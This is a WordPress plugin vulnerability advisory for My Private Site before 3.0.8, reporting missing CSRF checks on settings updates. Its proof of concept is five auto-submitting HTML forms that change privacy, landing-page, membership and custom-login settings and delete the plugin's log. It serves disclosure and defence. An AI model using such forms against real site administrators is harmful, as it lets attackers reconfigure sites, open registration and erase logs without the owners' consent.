WordPress Plugin Vulnerabilities
My Private Site < 3.0.8 - Arbitrary Settings Update via CSRF
Description
The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
Proof of Concept
<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST"> <input type="text" name="action" value="my_private_site_tab_site_privacy"> <input type="text" name="jr_ps_admin_advanced_compatibility_mode" value="STANDARD"> <input type="text" name="jr_ps_button_site_privacy_save" value="Save Privacy Status"> </form> <script> document.getElementById("test").submit(); </script> <form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST"> <input type="text" name="action" value="my_private_site_tab_landing_page"> <input type="text" name="jr_ps_admin_landing_page_option" value="url"> <input type="text" name="jr_ps_admin_landing_page_url" value="https://example.com/whatever"> <input type="text" name="jr_ps_button_landing_page_save" value="Save Landing Page"> </form> <script> document.getElementById("test").submit(); </script> <form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST"> <input type="text" name="action" value="my_private_site_tab_membership"> <input type="text" name="jr_ps_admin_membership_register" value="on"> <input type="text" name="jr_ps_admin_membership_reveal" value="on"> <input type="text" name="jr_ps_button_membership_save" value="Update Options"> </form> <script> document.getElementById("test").submit(); </script> <form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST"> <input type="text" name="action" value="my_private_site_tab_advanced"> <input type="text" name="jr_ps_admin_advanced_enable_custom_login" value="on"> <input type="text" name="jr_ps_admin_advanced_url" value="https://example.com.google.com"> <input type="text" name="jr_ps_admin_advanced_password_reset_url" value=""> <input type="text" name="jr_ps_button_advanced_save" value="Save Advanced Options"> <input type="text" name="my_private_site_system_information" value="The log is empty."> </form> <script> document.getElementById("test").submit(); </script> <form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST"> <input type="text" name="action" value="my_private_site_tab_advanced"> <input type="text" name="jr_ps_admin_advanced_url" value=""> <input type="text" name="jr_ps_admin_advanced_password_reset_url" value=""> <input type="text" name="my_private_site_system_information" value="The log is empty."> <input type="text" name="jr_ps_button_settings_logs_delete" value="Delete Log"> </form> <script> document.getElementById("test").submit(); </script>
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-06-01 (about 1 years ago)
Added
2022-06-01 (about 1 years ago)
Last Updated
2023-03-01 (about 1 years ago)